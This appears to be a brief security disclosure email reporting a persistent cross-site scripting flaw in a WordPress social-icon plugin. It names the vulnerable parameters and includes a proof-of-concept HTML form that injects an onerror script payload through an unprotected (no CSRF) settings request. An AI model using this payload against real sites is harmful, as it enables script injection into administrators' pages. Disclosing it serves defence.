Hello,
1. Persistent Cross-Site Scripting (XSS)
Authenticated administrators can store html/js code (there is no CSRF protection).
Url: POST
Vulnerable parameters: acx_si_theme, acx_si_twitter, acx_si_facebook, acx_si_youtube, acx_si_linkedin, acx_si_gplus, acx_si_credi, $acx_si_icon_size, acx_si_display, acx_si_pinterest, acx_si_feed
Example PHP callstack:
/floating-social-media-icon/social-icon.php:161
Verification:
--
<input type="text" name="acurax_social_icon_hidden" value='Y' />
<input type="text" name="acx_si_theme" value='"><img src=x onerror=alert(1) />'
/>
<input type="submit" />
</form>
--
--
Regards,
Marcin Probola,